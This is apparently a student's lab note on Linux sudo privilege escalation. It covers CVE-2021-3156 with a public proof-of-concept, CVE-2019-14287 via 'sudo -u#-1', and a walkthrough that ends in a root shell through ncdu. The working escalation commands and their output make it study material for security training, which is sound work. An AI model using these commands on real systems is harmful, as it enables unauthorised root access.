# Intro - `sudo` (aka substitute user do) is used to start processes with the rights of another user -  `/etc/sudoers` file specifies which users or groups are allowed to run specific programs and with what privileges - The below command removes comments and lines beginning with spaces ```bash sudo cat /etc/sudoers | grep -v "#" | sed -r '/^\s*$/d' Defaults env_reset Defaults mail_badpass Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" Defaults use_pty root ALL=(ALL:ALL) ALL %admin ALL=(ALL) ALL %sudo ALL=(ALL:ALL) ALL cry0l1t3 ALL=(ALL) /usr/bin/id @includedir /etc/sudoers.d ``` # CVE-2021-3156 - `CVE-2021-3156` is a relatively recent `sudo` vuln based on a heap-based buffer overflow - This CVE at least affects the follows `sudo` versions: - 1.8.31 - Ubuntu 20.04 - 1.8.27 - Debian 10 - 1.9.2 - Fedora 33 - Enumerate `sudo` version based on the below ```bash sudo -V | head -n1 Sudo version 1.8.31 ``` - There is also a public [PoC](https://github.com/blasty/CVE-2021-3156) that can be used to exploit this CVE - Below we clone the associated repo and build the binary ```bash git clone https://github.com/blasty/CVE-2021-3156.git cd CVE-2021-3156 make ``` - Now run the newly built binary ```bash ./sudo-hax-me-a-sandwich ``` - If we don't already know, we can enumerate the target's OS with the below commands ```bash cat /etc/lsb-release cat /etc/os-release ``` # Sudo Policy Bypass - [CVE-2019-14287](https://www.sudo.ws/security/advisories/minus_1_uid/) affects all versions below `1.8.28` - This exploit requires a single prerequisite: It had to allow a user in the `/etc/sudoers` file to execute a specific command such as below ```bash sudo -l User cry0l1t3 may run the following commands on Penny: ALL=(ALL) /usr/bin/id ``` - `sudo` allows command with a specific UID to be executed - Below we can enumerate the current user's UID ```bash cat /etc/passwd | grep cry0l1t3 ``` - However, if a negative ID (`-1`) is entered at `sudo`, this results in processing the ID `0`, which only the `root` has ```bash sudo -u#-1 id root@nix02:/home/cry0l1t3# id uid=0(root) gid=1005(cry0l1t3) groups=1005(cry0l1t3) ``` --- # Exercise # Initial Enum - `ping` test ![[images/Pasted image 20260213194547.png]] - `nmap` scans ![[images/Pasted image 20260213194659.png]] - `ssh` into target with given creds - light internal enum on target ![[images/Pasted image 20260213194639.png]] # sudo enum - determine `sudo` version ![[images/Pasted image 20260213194722.png]] - This version is vulnerable to `CVE-2021-3156` - Because this version `1.8.21` is lower than version `1.8.28` and we can execute at least one specified command (i.e., `/bin/ncdu`), this machine is vulnerable to the `sudo` policy bypass - determine OS ![[images/Pasted image 20260213194911.png]] - determine current user's UID ![[images/Pasted image 20260213195000.png]] ## CVE-2021-3156 - `git clone` the `CVE-2021-3156` repo and build the associated binary ![[images/Pasted image 20260213195513.png]] - now we have the `sudo-hax-me-a-sandwich` binary ![[images/Pasted image 20260213195558.png]] - archive this dir ![[images/Pasted image 20260213195912.png]] - serve up this dir from Kali and grab the archive from the target ![[images/Pasted image 20260213200235.png]] ![[images/Pasted image 20260213200215.png]] - unarchive the tarball - run exploit with focal fossa argument > glibc error ![[images/Pasted image 20260213200415.png]] - we need to build the binary on the target because the target uses glbic version 2.31 and our Kali box has version 2.42 ![[images/Pasted image 20260213200527.png]] - start over: `sudo git clone https://github.com/blasty/CVE-2021-3156.git` and `cd CVE-2021-3156.git && sudo tar -cvf cve.tar .` - serve up the tarball and download on target ![[images/Pasted image 20260213200949.png]] - unarchive the tarball and build the binary > `make` is not on target? ![[images/Pasted image 20260213201217.png]] ## sudo policy bypass - run `/bin/ncdu` with `sudo` privs while specifying the -1 UID we see a menu associated with the current dir ![[images/Pasted image 20260213201550.png]] - check out yhe `man` page for `ncdu` ![[images/Pasted image 20260213201653.png]] - `b` option for `ncdu` allows us to spawn a shell in the current directory - try above again and press `b` > root! ![[images/Pasted image 20260213201735.png]]